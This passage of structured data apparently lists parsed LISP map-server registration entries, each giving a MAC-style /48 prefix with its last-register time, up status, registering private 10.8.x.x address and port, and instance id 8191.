"0057.d2ff.b2a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.b2b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b3c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b3da/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b3e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.b3e6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b3ef/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b3f2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b3fb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b305/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b30b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b30e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b317/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b31d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0057.d2ff.b32c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b33b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b353/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.b374/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b383/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0057.d2ff.b3b6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"0057.d2ff.b4c4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b4c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b4cd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b4df/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b4ee/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0057.d2ff.b401/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b41c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b440/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b446/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b44c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b44f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b455/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b458/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b45b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b45e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b476/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b488/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b48e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b5d2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b5e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b5f9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b503/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b509/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b512/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b521/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b524/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.b545/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b566/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b575/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b59c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b5a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b5ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b61a/48": {
"last_register": "1d10h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.b65c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.b8db/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b836/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b84b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b88a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b8a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b90b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.b917/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b9b9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b9bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.bac7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.bad3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.badf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.bae2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.ba04/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.ba22/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.ba64/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.baa0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.bac1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.bbed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.bb1b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.bb45/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.bb72/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.bb81/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.bcef/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.bc02/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.bdb5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.be51/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.be99/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.c0f7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.c001/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.c007/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.c019/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.c05e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.c067/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.c082/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.c139/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"005f.86ff.c676/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0062.ecff.e576/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0062.ecff.384b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.1c92/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"006c.bcff.1d2d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"006c.bcff.1e59/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"006c.bcff.20db/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.1189/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.1c7f/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"006c.bcff.1c80/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.1c86/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.848a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0072.78ff.fa5a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0076.86ff.a30f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0076.86ff.adf5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0076.86ff.b6c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0077.8dff.3aba/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0087.31ff.3851/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"009e.1eff.eab7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"009e.1eff.9ec2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"009e.1eff.a924/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"009e.1eff.b596/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"009e.1eff.bea2/48": {
"last_register": "04:49:36",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"009e.1eff.1a67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"009e.1eff.a062/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"009e.1eff.a227/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"009e.1eff.a5cf/48": {
"last_register": "02:53:18",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00a3.d1ff.d059/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"00a3.d1ff.2e75/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00a5.bfff.2153/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00a5.bfff.32d4/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00a5.bfff.70f5/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"00a5.bfff.7e39/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00a7.42ff.ca4c/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00a7.42ff.7046/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00a7.42ff.704b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00aa.6eff.0b7f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00af.1fff.47d7/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00af.1fff.ce6d/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00af.1fff.e5ed/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00af.1fff.f1d2/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00b1.e3ff.bb2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.bb41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.bb7a/48": {
"last_register": "08:18:39",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bb80/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bb92/48": {
"last_register": "10:48:23",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bc19/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.bc25/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.bdcf/48": {
"last_register": "04:22:38",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bde1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.bdea/48": {
"last_register": "14:57:37",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.bdf6/48": {
"last_register": "15:03:49",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bd7e/48": {
"last_register": "05:02:13",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bd90/48": {
"last_register": "02:17:56",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00b1.e3ff.bd96/48": {
"last_register": "1d17h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.bda8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.bdae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00b1.e3ff.be62/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.be8f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.be92/48": {
"last_register": "09:56:06",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.beb6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.bfbb/48": {
"last_register": "07:04:21",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.bfd9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.bfe2/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.bf52/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.bf5b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.bf6d/48": {
"last_register": "03:29:36",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c036/48": {
"last_register": "11:50:16",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.c039/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"00b1.e3ff.c066/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.c1ce/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c11a/48": {
"last_register": "01:37:27",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c147/48": {
"last_register": "01:37:23",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c168/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c25b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c29d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c2a6/48": {
"last_register": "00:11:27",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c2b2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.c3e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c3ed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.c306/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00b1.e3ff.c38d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c402/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c43e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00b1.e3ff.c5cd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c5d6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.c5e5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c5f4/48": {
"last_register": "1d06h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c5f7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00b1.e3ff.c552/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c573/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c576/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.c57f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00b1.e3ff.c591/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c6ba/48": {
"last_register": "14:19:31",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.c60c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.c636/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00b1.e3ff.c7c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c70b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.c70e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.c71a/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c71d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"00b1.e3ff.c73b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c8be/48": {
"last_register": "08:01:32",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.c822/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c82e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.c9e1/48": {
"last_register": "06:27:10",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c9e4/48": {
"last_register": "01:06:57",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c9e7/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.c918/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c91b/48": {
"last_register": "00:24:24",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c933/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.cbca/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00b1.e3ff.cb9a/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.ccc6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.cc9f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00b1.e3ff.cca8/48": {
